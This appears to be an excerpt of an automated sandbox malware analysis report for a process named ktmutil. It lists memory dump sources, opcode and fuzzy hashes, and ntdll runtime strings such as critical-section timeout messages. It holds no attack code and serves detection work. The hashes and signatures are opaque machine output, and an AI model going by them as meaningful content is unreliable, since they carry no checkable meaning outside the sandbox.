• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: e009565eb17cf7e0d5f3d495fe25a5838c887fc53bf855ec9a4b625f41186788
• Instruction ID: ce14d0e14ea01b27c8ab75d0c4535213292f1beb53462244d55ac030f39fabca
• Opcode Fuzzy Hash: e009565eb17cf7e0d5f3d495fe25a5838c887fc53bf855ec9a4b625f41186788
• Instruction Fuzzy Hash: 38510635A003196EDB24EBA9DCC5FFE77BCEF05308F4440A9E605AB291E7719A418B50

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction ID: 042a9de0537d21ce435fe4f0758e0809c7b636fc0ec0e155cae3279587714d11
• Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction Fuzzy Hash: 80023575608341AFD304DF28C490A6BBBF5EFC8700F05892EF9999B2A4DB35E905CB56

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: 8bcfd3f51f991cd356edf5280008a103a60722e9b52c59641f6da1e6b93e04e0
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: B5819074E05289AEDF34CE68C8D17FEFBB5AF45360F1C4259E861AB390C73899408B64

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: f3a07d784721f5dcba72821def7dd2fbc4c6ae7db09da1aff036c4d792cf313a
• Instruction ID: 3d2efd1e6de992e7eb8c6a247df100b92f88a3448847767661fa9b15b622de69
• Opcode Fuzzy Hash: f3a07d784721f5dcba72821def7dd2fbc4c6ae7db09da1aff036c4d792cf313a
• Instruction Fuzzy Hash: 9B21677AE00229ABDB10EF79CC809EFB7FCEF54650F480515E915E7240E735DA058B91

Strings
• RTL: Re-Waiting, xrefs: 033A031E
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033A02E7
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033A02BD
Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: 96a16868dc427f3a065347153c68b3478d754fc0e040704174501d28fa99e35b
• Instruction ID: 437e2469649998cca6c8fa11ec96c069577005ed4a89f73e452acc863c8f3f77
• Opcode Fuzzy Hash: 96a16868dc427f3a065347153c68b3478d754fc0e040704174501d28fa99e35b
• Instruction Fuzzy Hash: E8E19C34604B41DFD728CF28C8C4B6AB7E4FB88314F184A69F9A58B6E1D774D945CB42

Strings
• RTL: Re-Waiting, xrefs: 033A7BAC
• RTL: Resource at %p, xrefs: 033A7B8E
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 033A7B7F
Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: 778f3610cc060eccc8c9b23e3f192b4477a872bb81f3dde8e82e9c2445b6bc7d
• Instruction ID: 7d52cc9a83c15f7016bc0cbcfe147df8626b1fa6f84c5230747718fbedae6495
• Opcode Fuzzy Hash: 778f3610cc060eccc8c9b23e3f192b4477a872bb81f3dde8e82e9c2445b6bc7d
• Instruction Fuzzy Hash: 3D419D357017029FC724DA6ACCC0B6AF7E9EB88710F144A2DE95ADF690DB71E8058F91

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033A728C
Strings
• RTL: Re-Waiting, xrefs: 033A72C1
• RTL: Resource at %p, xrefs: 033A72A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 033A7294
Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: 682e6953a81da2a4605136670f444597cd0ee6ffd89782d769c6e6ade0a1cdb8
• Instruction ID: d34ebea0a057e4bc556911e11a4a49b00947e690c439a05b0e144202ace073ce
• Opcode Fuzzy Hash: 682e6953a81da2a4605136670f444597cd0ee6ffd89782d769c6e6ade0a1cdb8
• Instruction Fuzzy Hash: 5641FF35B00B06AFC721DE69CCC1B6AF7A9FF84710F144629F995EB640DB21E8528BD1

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: e9ae655b1dc3bc7e3f71e34a7f3a1e54a4192c51c100f3cfcb5a99cd31215945
• Instruction ID: fe74221f18d27b38d8a758b61af92e409663784643dfcc52f47fad79b8f51aab
• Opcode Fuzzy Hash: e9ae655b1dc3bc7e3f71e34a7f3a1e54a4192c51c100f3cfcb5a99cd31215945
• Instruction Fuzzy Hash: E0314876A002299FDB60EF29DC80BEFB7FCEF44650F444556E849E7240EB309A458F60

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: 1188f55f68dda7790c844437d2a5ac53c625de06af632b470c95c1bf52cf1a6b
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: 1991B270E0021A9BDB34DF69CDC5ABEB7A5EF44320F18461AE865EB6D0D73C9942CB50

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 3b5e93385d0931a11f200563d9383557f7ba7e5ae91807c694ff7a3b18fa2e13
• Instruction ID: 23aeeb79664e049d612244274ce86437f384dfee2462f3e96e639fcc59e62424
• Opcode Fuzzy Hash: 3b5e93385d0931a11f200563d9383557f7ba7e5ae91807c694ff7a3b18fa2e13
• Instruction Fuzzy Hash: 55811976D01669DBDB31DF54CC84BEAB7B8AB08710F0445EAA919B7680D7709E84CFA0
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 033BCFBD
Strings
Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @$@4Qw@4Qw
• API String ID: 4062629308-2383119779
• Opcode ID: a414b3fc98107cbbadd2e3c5637af35b87dc7d3daa985c7009262cf0a87eef52
• Instruction ID: 5192f3c45b1055e374b36b033b6d573336dbefdd677cf3f64cad9deef03527db
• Opcode Fuzzy Hash: a414b3fc98107cbbadd2e3c5637af35b87dc7d3daa985c7009262cf0a87eef52
• Instruction Fuzzy Hash: 98419DB9E002249FCB21DFA5C880AAEBBF8EF45714F14416AEA14EF654D738D801CB64